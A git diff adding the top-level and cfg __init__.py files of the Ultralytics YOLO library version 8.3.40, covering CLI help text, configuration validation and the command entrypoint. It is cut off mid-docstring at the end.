diff --git a/2024.ultralytics/v8.3.40/__init__.py b/2024.ultralytics/v8.3.40/__init__.py new file mode 100644 index 0000000..601d1bb --- /dev/null +++ b/2024.ultralytics/v8.3.40/__init__.py @@ -0,0 +1,29 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +__version__ = "8.3.40" + +import os + +# Set ENV variables (place before imports) +if not os.environ.get("OMP_NUM_THREADS"): + os.environ["OMP_NUM_THREADS"] = "1" # default for reduced CPU utilization during training + +from ultralytics.models import NAS, RTDETR, SAM, YOLO, FastSAM, YOLOWorld +from ultralytics.utils import ASSETS, SETTINGS +from ultralytics.utils.checks import check_yolo as checks +from ultralytics.utils.downloads import download + +settings = SETTINGS +__all__ = ( + "__version__", + "ASSETS", + "YOLO", + "YOLOWorld", + "NAS", + "SAM", + "FastSAM", + "RTDETR", + "checks", + "download", + "settings", +) diff --git a/2024.ultralytics/v8.3.40/cfg/__init__.py b/2024.ultralytics/v8.3.40/cfg/__init__.py new file mode 100644 index 0000000..e4c239f --- /dev/null +++ b/2024.ultralytics/v8.3.40/cfg/__init__.py @@ -0,0 +1,1014 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import shutil +import subprocess +import sys +from pathlib import Path +from types import SimpleNamespace +from typing import Dict, List, Union + +import cv2 + +from ultralytics.utils import ( + ASSETS, + DEFAULT_CFG, + DEFAULT_CFG_DICT, + DEFAULT_CFG_PATH, + DEFAULT_SOL_DICT, + IS_VSCODE, + LOGGER, + RANK, + ROOT, + RUNS_DIR, + SETTINGS, + SETTINGS_FILE, + TESTS_RUNNING, + IterableSimpleNamespace, + __version__, + checks, + colorstr, + deprecation_warn, + vscode_msg, + yaml_load, + yaml_print, +) + +# Define valid solutions +SOLUTION_MAP = { + "count": ("ObjectCounter", "count"), + "heatmap": ("Heatmap", "generate_heatmap"), + "queue": ("QueueManager", "process_queue"), + "speed": ("SpeedEstimator", "estimate_speed"), + "workout": ("AIGym", "monitor"), + "analytics": ("Analytics", "process_data"), + "trackzone": ("TrackZone", "trackzone"), + "help": None, +} + +# Define valid tasks and modes +MODES = {"train", "val", "predict", "export", "track", "benchmark"} +TASKS = {"detect", "segment", "classify", "pose", "obb"} +TASK2DATA = { + "detect": "coco8.yaml", + "segment": "coco8-seg.yaml", + "classify": "imagenet10", + "pose": "coco8-pose.yaml", + "obb": "dota8.yaml", +} +TASK2MODEL = { + "detect": "yolo11n.pt", + "segment": "yolo11n-seg.pt", + "classify": "yolo11n-cls.pt", + "pose": "yolo11n-pose.pt", + "obb": "yolo11n-obb.pt", +} +TASK2METRIC = { + "detect": "metrics/mAP50-95(B)", + "segment": "metrics/mAP50-95(M)", + "classify": "metrics/accuracy_top1", + "pose": "metrics/mAP50-95(P)", + "obb": "metrics/mAP50-95(B)", +} +MODELS = {TASK2MODEL[task] for task in TASKS} + +ARGV = sys.argv or ["", ""] # sometimes sys.argv = [] +SOLUTIONS_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo solutions' usage overview: + + yolo solutions SOLUTION ARGS + + Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())} + ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults + at https://docs.ultralytics.com/usage/cfg + + 1. Call object counting solution + yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] + + 2. Call heatmaps solution + yolo solutions heatmap colormap=cv2.COLORMAP_PARAULA model=yolo11n.pt + + 3. Call queue management solution + yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt + + 4. Call workouts monitoring solution for push-ups + yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10] + + 5. Generate analytical graphs + yolo solutions analytics analytics_type="pie" + + 6. Track Objects Within Specific Zones + yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)] + """ +CLI_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo' commands use the following syntax: + + yolo TASK MODE ARGS + + Where TASK (optional) is one of {TASKS} + MODE (required) is one of {MODES} + ARGS (optional) are any number of custom 'arg=value' pairs like 'imgsz=320' that override defaults. + See all ARGS at https://docs.ultralytics.com/usage/cfg or with 'yolo cfg' + + 1. Train a detection model for 10 epochs with an initial learning_rate of 0.01 + yolo train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01 + + 2. Predict a YouTube video using a pretrained segmentation model at image size 320: + yolo predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320 + + 3. Val a pretrained detection model at batch-size 1 and image size 640: + yolo val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640 + + 4. Export a YOLO11n classification model to ONNX format at image size 224 by 128 (no TASK required) + yolo export model=yolo11n-cls.pt format=onnx imgsz=224,128 + + 5. Streamlit real-time webcam inference GUI + yolo streamlit-predict + + 6. Ultralytics solutions usage + yolo solutions count or in {list(SOLUTION_MAP.keys())} source="path/to/video/file.mp4" + + 7. Run special commands: + yolo help + yolo checks + yolo version + yolo settings + yolo copy-cfg + yolo cfg + yolo solutions help + + Docs: https://docs.ultralytics.com + Solutions: https://docs.ultralytics.com/solutions/ + Community: https://community.ultralytics.com + GitHub: https://github.com/ultralytics/ultralytics + """ + +# Define keys for arg type checks +CFG_FLOAT_KEYS = { # integer or float arguments, i.e. x=2 and x=2.0 + "warmup_epochs", + "box", + "cls", + "dfl", + "degrees", + "shear", + "time", + "workspace", + "batch", +} +CFG_FRACTION_KEYS = { # fractional float arguments with 0.0<=values<=1.0 + "dropout", + "lr0", + "lrf", + "momentum", + "weight_decay", + "warmup_momentum", + "warmup_bias_lr", + "hsv_h", + "hsv_s", + "hsv_v", + "translate", + "scale", + "perspective", + "flipud", + "fliplr", + "bgr", + "mosaic", + "mixup", + "copy_paste", + "conf", + "iou", + "fraction", +} +CFG_INT_KEYS = { # integer-only arguments + "epochs", + "patience", + "workers", + "seed", + "close_mosaic", + "mask_ratio", + "max_det", + "vid_stride", + "line_width", + "nbs", + "save_period", +} +CFG_BOOL_KEYS = { # boolean-only arguments + "save", + "exist_ok", + "verbose", + "deterministic", + "single_cls", + "rect", + "cos_lr", + "overlap_mask", + "val", + "save_json", + "save_hybrid", + "half", + "dnn", + "plots", + "show", + "save_txt", + "save_conf", + "save_crop", + "save_frames", + "show_labels", + "show_conf", + "visualize", + "augment", + "agnostic_nms", + "retina_masks", + "show_boxes", + "keras", + "optimize", + "int8", + "dynamic", + "simplify", + "nms", + "profile", + "multi_scale", +} + + +def cfg2dict(cfg): + """ + Converts a configuration object to a dictionary. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration object to be converted. Can be a file path, + a string, a dictionary, or a SimpleNamespace object. + + Returns: + (Dict): Configuration object in dictionary format. + + Examples: + Convert a YAML file path to a dictionary: + >>> config_dict = cfg2dict("config.yaml") + + Convert a SimpleNamespace to a dictionary: + >>> from types import SimpleNamespace + >>> config_sn = SimpleNamespace(param1="value1", param2="value2") + >>> config_dict = cfg2dict(config_sn) + + Pass through an already existing dictionary: + >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"}) + + Notes: + - If cfg is a path or string, it's loaded as YAML and converted to a dictionary. + - If cfg is a SimpleNamespace object, it's converted to a dictionary using vars(). + - If cfg is already a dictionary, it's returned unchanged. + """ + if isinstance(cfg, (str, Path)): + cfg = yaml_load(cfg) # load dict + elif isinstance(cfg, SimpleNamespace): + cfg = vars(cfg) # convert to dict + return cfg + + +def get_cfg(cfg: Union[str, Path, Dict, SimpleNamespace] = DEFAULT_CFG_DICT, overrides: Dict = None): + """ + Load and merge configuration data from a file or dictionary, with optional overrides. + + Args: + cfg (str | Path | Dict | SimpleNamespace): Configuration data source. Can be a file path, dictionary, or + SimpleNamespace object. + overrides (Dict | None): Dictionary containing key-value pairs to override the base configuration. + + Returns: + (SimpleNamespace): Namespace containing the merged configuration arguments. + + Examples: + >>> from ultralytics.cfg import get_cfg + >>> config = get_cfg() # Load default configuration + >>> config = get_cfg("path/to/config.yaml", overrides={"epochs": 50, "batch_size": 16}) + + Notes: + - If both `cfg` and `overrides` are provided, the values in `overrides` will take precedence. + - Special handling ensures alignment and correctness of the configuration, such as converting numeric + `project` and `name` to strings and validating configuration keys and values. + - The function performs type and value checks on the configuration data. + """ + cfg = cfg2dict(cfg) + + # Merge overrides + if overrides: + overrides = cfg2dict(overrides) + if "save_dir" not in cfg: + overrides.pop("save_dir", None) # special override keys to ignore + check_dict_alignment(cfg, overrides) + cfg = {**cfg, **overrides} # merge cfg and overrides dicts (prefer overrides) + + # Special handling for numeric project/name + for k in "project", "name": + if k in cfg and isinstance(cfg[k], (int, float)): + cfg[k] = str(cfg[k]) + if cfg.get("name") == "model": # assign model to 'name' arg + cfg["name"] = cfg.get("model", "").split(".")[0] + LOGGER.warning(f"WARNING ⚠️ 'name=model' automatically updated to 'name={cfg['name']}'.") + + # Type and Value checks + check_cfg(cfg) + + # Return instance + return IterableSimpleNamespace(**cfg) + + +def check_cfg(cfg, hard=True): + """ + Checks configuration argument types and values for the Ultralytics library. + + This function validates the types and values of configuration arguments, ensuring correctness and converting + them if necessary. It checks for specific key types defined in global variables such as CFG_FLOAT_KEYS, + CFG_FRACTION_KEYS, CFG_INT_KEYS, and CFG_BOOL_KEYS. + + Args: + cfg (Dict): Configuration dictionary to validate. + hard (bool): If True, raises exceptions for invalid types and values; if False, attempts to convert them. + + Examples: + >>> config = { + ... "epochs": 50, # valid integer + ... "lr0": 0.01, # valid float + ... "momentum": 1.2, # invalid float (out of 0.0-1.0 range) + ... "save": "true", # invalid bool + ... } + >>> check_cfg(config, hard=False) + >>> print(config) + {'epochs': 50, 'lr0': 0.01, 'momentum': 1.2, 'save': False} # corrected 'save' key + + Notes: + - The function modifies the input dictionary in-place. + - None values are ignored as they may be from optional arguments. + - Fraction keys are checked to be within the range [0.0, 1.0]. + """ + for k, v in cfg.items(): + if v is not None: # None values may be from optional args + if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = float(v) + elif k in CFG_FRACTION_KEYS: + if not isinstance(v, (int, float)): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')" + ) + cfg[k] = v = float(v) + if not (0.0 <= v <= 1.0): + raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.") + elif k in CFG_INT_KEYS and not isinstance(v, int): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')" + ) + cfg[k] = int(v) + elif k in CFG_BOOL_KEYS and not isinstance(v, bool): + if hard: + raise TypeError( + f"'{k}={v}' is of invalid type {type(v).__name__}. " + f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')" + ) + cfg[k] = bool(v) + + +def get_save_dir(args, name=None): + """ + Returns the directory path for saving outputs, derived from arguments or default settings. + + Args: + args (SimpleNamespace): Namespace object containing configurations such as 'project', 'name', 'task', + 'mode', and 'save_dir'. + name (str | None): Optional name for the output directory. If not provided, it defaults to 'args.name' + or the 'args.mode'. + + Returns: + (Path): Directory path where outputs should be saved. + + Examples: + >>> from types import SimpleNamespace + >>> args = SimpleNamespace(project="my_project", task="detect", mode="train", exist_ok=True) + >>> save_dir = get_save_dir(args) + >>> print(save_dir) + my_project/detect/train + """ + if getattr(args, "save_dir", None): + save_dir = args.save_dir + else: + from ultralytics.utils.files import increment_path + + project = args.project or (ROOT.parent / "tests/tmp/runs" if TESTS_RUNNING else RUNS_DIR) / args.task + name = name or args.name or f"{args.mode}" + save_dir = increment_path(Path(project) / name, exist_ok=args.exist_ok if RANK in {-1, 0} else True) + + return Path(save_dir) + + +def _handle_deprecation(custom): + """ + Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings. + + Args: + custom (Dict): Configuration dictionary potentially containing deprecated keys. + + Examples: + >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2} + >>> _handle_deprecation(custom_config) + >>> print(custom_config) + {'show_boxes': True, 'show_labels': True, 'line_width': 2} + + Notes: + This function modifies the input dictionary in-place, replacing deprecated keys with their current + equivalents. It also handles value conversions where necessary, such as inverting boolean values for + 'hide_labels' and 'hide_conf'. + """ + for key in custom.copy().keys(): + if key == "boxes": + deprecation_warn(key, "show_boxes") + custom["show_boxes"] = custom.pop("boxes") + if key == "hide_labels": + deprecation_warn(key, "show_labels") + custom["show_labels"] = custom.pop("hide_labels") == "False" + if key == "hide_conf": + deprecation_warn(key, "show_conf") + custom["show_conf"] = custom.pop("hide_conf") == "False" + if key == "line_thickness": + deprecation_warn(key, "line_width") + custom["line_width"] = custom.pop("line_thickness") + if key == "label_smoothing": + deprecation_warn(key) + custom.pop("label_smoothing") + + return custom + + +def check_dict_alignment(base: Dict, custom: Dict, e=None): + """ + Checks alignment between custom and base configuration dictionaries, handling deprecated keys and providing error + messages for mismatched keys. + + Args: + base (Dict): The base configuration dictionary containing valid keys. + custom (Dict): The custom configuration dictionary to be checked for alignment. + e (Exception | None): Optional error instance passed by the calling function. + + Raises: + SystemExit: If mismatched keys are found between the custom and base dictionaries. + + Examples: + >>> base_cfg = {"epochs": 50, "lr0": 0.01, "batch_size": 16} + >>> custom_cfg = {"epoch": 100, "lr": 0.02, "batch_size": 32} + >>> try: + ... check_dict_alignment(base_cfg, custom_cfg) + ... except SystemExit: + ... print("Mismatched keys found") + + Notes: + - Suggests corrections for mismatched keys based on similarity to valid keys. + - Automatically replaces deprecated keys in the custom configuration with updated equivalents. + - Prints detailed error messages for each mismatched key to help users correct their configurations. + """ + custom = _handle_deprecation(custom) + base_keys, custom_keys = (set(x.keys()) for x in (base, custom)) + mismatched = [k for k in custom_keys if k not in base_keys] + if mismatched: + from difflib import get_close_matches + + string = "" + for x in mismatched: + matches = get_close_matches(x, base_keys) # key list + matches = [f"{k}={base[k]}" if base.get(k) is not None else k for k in matches] + match_str = f"Similar arguments are i.e. {matches}." if matches else "" + string += f"'{colorstr('red', 'bold', x)}' is not a valid YOLO argument. {match_str}\n" + raise SyntaxError(string + CLI_HELP_MSG) from e + + +def merge_equals_args(args: List[str]) -> List[str]: + """ + Merges arguments around isolated '=' in a list of strings and joins fragments with brackets. + + This function handles the following cases: + 1. ['arg', '=', 'val'] becomes ['arg=val'] + 2. ['arg=', 'val'] becomes ['arg=val'] + 3. ['arg', '=val'] becomes ['arg=val'] + 4. Joins fragments with brackets, e.g., ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]'] + + Args: + args (List[str]): A list of strings where each element represents an argument or fragment. + + Returns: + List[str]: A list of strings where the arguments around isolated '=' are merged and fragments with brackets are joined. + + Examples: + >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"] + >>> merge_and_join_args(args) + ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]'] + """ + new_args = [] + current = "" + depth = 0 + + i = 0 + while i < len(args): + arg = args[i] + + # Handle equals sign merging + if arg == "=" and 0 < i < len(args) - 1: # merge ['arg', '=', 'val'] + new_args[-1] += f"={args[i + 1]}" + i += 2 + continue + elif arg.endswith("=") and i < len(args) - 1 and "=" not in args[i + 1]: # merge ['arg=', 'val'] + new_args.append(f"{arg}{args[i + 1]}") + i += 2 + continue + elif arg.startswith("=") and i > 0: # merge ['arg', '=val'] + new_args[-1] += arg + i += 1 + continue + + # Handle bracket joining + depth += arg.count("[") - arg.count("]") + current += arg + if depth == 0: + new_args.append(current) + current = "" + + i += 1 + + # Append any remaining current string + if current: + new_args.append(current) + + return new_args + + +def handle_yolo_hub(args: List[str]) -> None: + """ + Handles Ultralytics HUB command-line interface (CLI) commands for authentication. + + This function processes Ultralytics HUB CLI commands such as login and logout. It should be called when executing a + script with arguments related to HUB authentication. + + Args: + args (List[str]): A list of command line arguments. The first argument should be either 'login' + or 'logout'. For 'login', an optional second argument can be the API key. + + Examples: + ```bash + yolo login YOUR_API_KEY + ``` + + Notes: + - The function imports the 'hub' module from ultralytics to perform login and logout operations. + - For the 'login' command, if no API key is provided, an empty string is passed to the login function. + - The 'logout' command does not require any additional arguments. + """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. + - For more information on handling YOLO settings, visit: + https://docs.ultralytics.com/quickstart/#ultralytics-settings + """ + url = "https://docs.ultralytics.com/quickstart/#ultralytics-settings" # help URL + try: + if any(args): + if args[0] == "reset": + SETTINGS_FILE.unlink() # delete the settings file + SETTINGS.reset() # create new settings + LOGGER.info("Settings reset successfully") # inform the user that settings have been reset + else: # save a new setting + new = dict(parse_key_value_pair(a) for a in args) + check_dict_alignment(SETTINGS, new) + SETTINGS.update(new) + + print(SETTINGS) # print the current settings + LOGGER.info(f"💡 Learn more about Ultralytics Settings at {url}") + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ settings error: '{e}'. Please see {url} for help.") + + +def handle_yolo_solutions(args: List[str]) -> None: + """ + Processes YOLO solutions arguments and runs the specified computer vision solutions pipeline. + + Args: + args (List[str]): Command-line arguments for configuring and running the Ultralytics YOLO + solutions: https://docs.ultralytics.com/solutions/, It can include solution name, source, + and other configuration parameters. + + Returns: + None: The function processes video frames and saves the output but doesn't return any value. + + Examples: + Run people counting solution with default settings: + >>> handle_yolo_solutions(["count"]) + + Run analytics with custom configuration: + >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"]) + + Notes: + - Default configurations are merged from DEFAULT_SOL_DICT and DEFAULT_CFG_DICT + - Arguments can be provided in the format 'key=value' or as boolean flags + - Available solutions are defined in SOLUTION_MAP with their respective classes and methods + - If an invalid solution is provided, defaults to 'count' solution + - Output videos are saved in 'runs/solution/{solution_name}' directory + - For 'analytics' solution, frame numbers are tracked for generating analytical graphs + - Video processing can be interrupted by pressing 'q' + - Processes video frames sequentially and saves output in .avi format + - If no source is specified, downloads and uses a default sample video + """ + full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT} # arguments dictionary + overrides = {} + + # check dictionary alignment + for arg in merge_equals_args(args): + arg = arg.lstrip("-").rstrip(",") + if "=" in arg: + try: + k, v = parse_key_value_pair(arg) + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {arg: ""}, e) + elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool): + overrides[arg] = True + check_dict_alignment(full_args_dict, overrides) # dict alignment + + # Get solution name + if args and args[0] in SOLUTION_MAP: + if args[0] != "help": + s_n = args.pop(0) # Extract the solution name directly + else: + LOGGER.info(SOLUTIONS_HELP_MSG) + else: + LOGGER.warning( + f"⚠️ No valid solution provided. Using default 'count'. Available: {', '.join(SOLUTION_MAP.keys())}" + ) + s_n = "count" # Default solution if none provided + + if args and args[0] == "help": # Add check for return if user call `yolo solutions help` + return + + cls, method = SOLUTION_MAP[s_n] # solution class name, method name and default source + + from ultralytics import solutions # import ultralytics solutions + + solution = getattr(solutions, cls)(IS_CLI=True, **overrides) # get solution class i.e ObjectCounter + process = getattr(solution, method) # get specific function of class for processing i.e, count from ObjectCounter + + cap = cv2.VideoCapture(solution.CFG["source"]) # read the video file + + # extract width, height and fps of the video file, create save directory and initialize video writer + import os # for directory creation + from pathlib import Path + + from ultralytics.utils.files import increment_path # for output directory path update + + w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS)) + if s_n == "analytics": # analytical graphs follow fixed shape for output i.e w=1920, h=1080 + w, h = 1920, 1080 + save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False) + save_dir.mkdir(parents=True, exist_ok=True) # create the output directory + vw = cv2.VideoWriter(os.path.join(save_dir, "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h)) + + try: # Process video frames + f_n = 0 # frame number, required for analytical graphs + while cap.isOpened(): + success, frame = cap.read() + if not success: + break + frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame) + vw.write(frame) + if cv2.waitKey(1) & 0xFF == ord("q"): + break + finally: + cap.release() + + +def handle_streamlit_inference(): + """ + Open the Ultralytics Live Inference Streamlit app for real-time object detection. + + This function initializes and runs a Streamlit application designed for performing live object detection using + Ultralytics models. It checks for the required Streamlit package and launches the app. + + Examples: + >>> handle_streamlit_inference() + + Notes: + - Requires Streamlit version 1.29.0 or higher. + - The app is launched using the 'streamlit run' command. + - The Streamlit app file is located in the Ultralytics package directory. + """ + checks.check_requirements("streamlit>=1.29.0") + LOGGER.info("💡 Loading Ultralytics Live Inference app...") + subprocess.run(["streamlit", "run", ROOT / "solutions/streamlit_inference.py", "--server.headless", "true"]) + + +def parse_key_value_pair(pair: str = "key=value"): + """ + Parses a key-value pair string into separate key and value components. + + Args: + pair (str): A string containing a key-value pair in the format "key=value". + + Returns: + key (str): The parsed key. + value (str): The parsed value. + + Raises: + AssertionError: If the value is missing or empty. + + Examples: + >>> key, value = parse_key_value_pair("model=yolo11n.pt") + >>> print(f"Key: {key}, Value: {value}") + Key: model, Value: yolo11n.pt + + >>> key, value = parse_key_value_pair("epochs=100") + >>> print(f"Key: {key}, Value: {value}") + Key: epochs, Value: 100 + + Notes: + - The function splits the input string on the first '=' character. + - Leading and trailing whitespace is removed from both key and value. + - An assertion error is raised if the value is empty after stripping. + """ + k, v = pair.split("=", 1) # split on first '=' sign + k, v = k.strip(), v.strip() # remove spaces + assert v, f"missing '{k}' value" + return k, smart_value(v) + + +def smart_value(v): + """ + Converts a string representation of a value to its appropriate Python type. + + This function attempts to convert a given string into a Python object of the most appropriate type. It handles + conversions to None, bool, int, float, and other types that can be evaluated safely. + + Args: + v (str): The string representation of the value to be converted. + + Returns: + (Any): The converted value. The type can be None, bool, int, float, or the original string if no conversion + is applicable. + + Examples: + >>> smart_value("42") + 42 + >>> smart_value("3.14") + 3.14 + >>> smart_value("True") + True + >>> smart_value("None") + None + >>> smart_value("some_string") + 'some_string' + + Notes: + - The function uses a case-insensitive comparison for boolean and None values. + - For other types, it attempts to use Python's eval() function, which can be unsafe if used on untrusted input. + - If no conversion is possible, the original string is returned. + """ + v_lower = v.lower() + if v_lower == "none": + return None + elif v_lower == "true": + return True + elif v_lower == "false": + return False + else: + try: + return eval(v) + except Exception: + return v + + +def entrypoint(debug=""): + """ + Ultralytics entrypoint function for parsing and executing command-line arguments. + + This function serves as the main entry point for the Ultralytics CLI, parsing command-line arguments and + executing the corresponding tasks such as training, validation, prediction, exporting models, and more. + + Args: + debug (str): Space-separated string of command-line arguments for debugging purposes. + + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. imgsz=320 + for a in merge_equals_args(args): # merge spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. Using default 'format={overrides['format']}'.") + + # Run command in python + getattr(model, mode)(**overrides) # default args from model + + # Show help + LOGGER.info(f"💡 Learn more at https://docs.ultralytics.com/modes/{mode}") + + # Recommend VS Code extension + if IS_VSCODE and SETTINGS.get("vscode_msg", True): + LOGGER.info(vscode_msg()) + + +# Special modes -------------------------------------------------------------------------------------------------------- +def copy_default_cfg(): + """ + Copies the default configuration file and creates a new one with '_copy' appended to its name. + + This function duplicates the existing default configuration file (DEFAULT_CFG_PATH) and saves it + with '_copy' appended to its name in the current working directory. It provides a convenient way + to create a custom configuration file based on the default settings. + + Examples: + >>> copy_default_cfg() + # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml + # 